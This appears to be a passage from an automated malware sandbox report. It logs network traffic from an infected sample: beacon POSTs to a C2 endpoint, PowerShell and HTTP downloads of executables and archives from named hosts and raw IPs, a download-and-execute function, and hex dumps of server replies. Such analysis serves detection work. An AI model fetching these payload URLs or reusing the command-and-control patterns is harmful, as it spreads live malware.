                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rhafqfudulgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmucdlsvjvamj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebgowpcalmic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kguhhqwlowh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajhanernmeqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: gebeus.ru
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,5_2_00BA1099
                  Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
                  Source: global trafficHTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
                  Source: global trafficHTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
                  Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
                  Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
                  Source: global trafficDNS traffic detected: DNS query: evilos.cc
                  Source: global trafficDNS traffic detected: DNS query: gebeus.ru
                  Source: global trafficDNS traffic detected: DNS query: mussangroup.com
                  Source: global trafficDNS traffic detected: DNS query: funrecipebooks.com
                  Source: global trafficDNS traffic detected: DNS query: callosallsaospz.shop
                  Source: global trafficDNS traffic detected: DNS query: rentry.co
                  Source: global trafficDNS traffic detected: DNS query: store4.gofile.io
                  Source: global trafficDNS traffic detected: DNS query: liernessfornicsa.shop
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 7627
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 eb Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 